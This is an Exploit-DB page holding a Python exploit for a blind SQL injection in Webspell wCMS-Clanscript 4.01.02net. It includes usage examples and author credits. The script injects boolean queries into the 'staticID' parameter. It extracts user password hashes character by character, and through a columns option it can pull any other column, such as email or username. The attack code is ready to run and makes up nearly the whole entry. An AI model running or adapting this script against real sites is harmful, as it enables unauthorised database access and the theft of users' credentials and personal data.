Webspell wCMS-Clanscript4.01.02net - static Blind SQL Injection

EDB-ID:

15152

CVE:

N/A

EDB Verified:

Author:

Easy Laster

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-09-29

Vulnerable App: 
#----------------------------Information------------------------------------------------
#+Autor : Easy Laster
#+ICQ : 11-051-551
#+Date   : 29.09.2010
#+Script  : Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Exploit
#+Price : $00,00
#+Language :PHP
#+Discovered by Easy Laster
#+code by Dr.ChAoS
#+Security Group Undergroundagents,Free-hack and 4004-Security-Project
#+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
#Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
#N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
#and all member from free-hack.com.
#---------------------------------------------------------------------------------------
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, getopt

def out(str):
    sys.stdout.write(str)
    sys.stdout.flush()

def read_url(url):
    while True:
        try:
            src = urllib2.urlopen(url).read()
            break
        except:
            pass
    return src
   
class Exploit:
    charset = "0123456789abcdefABCDEF"
    url = ""
    charn = 1
    id = 1
    table_prefix = "webs_"
    table_field = ""
    passwd = ""
    columns = []
    find_passwd = True
   
    def __init__(self):
        if len(sys.argv) < 2:
            print "*****************************************************************************"
            print "*Webspell wCMS-Clanscript4.01.02net static&static Blind SQL Injection Exploit*"
            print "*****************************************************************************"
            print "*                Discovered and vulnerability by Easy Laster                *"
            print "*                             coded by Dr.ChAoS                             *"
            print "*****************************************************************************"
            print "* Usage:                                                                    *"
            print "* python exploit.py [OPTION...] [SWITCH...] <url>                           *"
            print "*                                                                           *"
            print "* Example:                                                                  *"
            print "*                                                                           *"
            print "* Get the password of the user with id 2:                                   *"
            print "* python exploit.py --id 2 http://site.de/path/                             *"
            print "*                                                                           *"
            print "* Get email, username and password of id 1:                                 *"
            print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/      *"
            print "*                                                                           *"
            print "* Switches:                                                                 *"
            print "* --nopw                                  Search no password                *"
            print "*                                                                           *"
            print "* Options:                                                                  *"
            print "* --id <user id>                          User id                           *"
            print "* --prefix <table prefix>                 Table prefix of ECP               *"
            print "* --charn <1 - 32, default = 1>           Start at position x               *"
            print "* --columns <max_chars:charn:column,...>  Get value of any column you want  *"
            print "*****************************************************************************"
            exit()
        opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"])
        for opt in opts:
            if opt[0] == "--id":
                self.id = int(opt[1])
            elif opt[0] == "--prefix":
                self.table_prefix = opt[1]
            elif opt[0] == "--charn":
                self.charn = int(opt[1])
            elif opt[0] == "--columns":
                for col in opt[1].split(","):
                    max, charx, name = col.split(":")
                    self.columns.append([int(max), int(charx), name, ""])
            elif opt[0] == "--nopw":
                self.find_passwd = False
        for switch in switches:
            if switch[:4] == "http":
                if switch[-1:] == "/":
                    self.url = switch
                else:
                    self.url = switch + "/"
    def valid_page(self, src):
        if "http://www.wookie.de/images/baustelle.gif" not in src:
            return True
        else:
            return False
    def generate_url(self, ascii):
        return self.url + "index.php?site=static&staticID=1%27+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "user+WHERE+userid=" + str(self.id) + ")," + str(self.charn) + ",1))%3E" + str(ord(ascii)) + "--+"
    def start(self):
        print "Exploiting..."
        if self.find_passwd:
            charx = self.charn
            self.password()
        if len(self.columns) > 0:
            self.read_columns()
        print "All finished!\n"
        print "------ Results ------"
        if len(self.columns) > 0:
            for v in self.columns:
                print "Column \"" + v[2] + "\": " + v[3]
        if self.find_passwd:
            if len(self.passwd) == 32 - charx + 1:
                print "Password: " + self.passwd
            else:
                print "Password not found!"
        print "---------------------"
    def read_columns(self):
        end = False
        charrange = [0]
        charrange.extend(range(32, 256))
        for i in range(len(self.columns)):
            out("Getting value of \"" + self.columns[i][2] + "\": ")
            self.table_field = self.columns[i][2]
            self.charn = self.columns[i][1]
            for pwc in range(self.charn, self.columns[i][0] + 1):
                if end == True:
                    break
                self.charn = pwc
                end = False
                for c in charrange:
                    src = read_url(self.generate_url(chr(c)))
                    if self.valid_page(src):
                        if c == 0:
                            end = True
                        else:
                            self.columns[i][3] += chr(c)
                            out(chr(c))
                        break
            out("\n")
    def password(self):
        out("Getting password: ")
        self.table_field = "password"
        for pwc in range(self.charn, 33):
            self.charn = pwc
            for c in self.charset:
                src = read_url(self.generate_url(c))
                if self.valid_page(src):
                    self.passwd += c
                    out(c)
                    break
        out("\n")

exploit = Exploit()
exploit.start()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services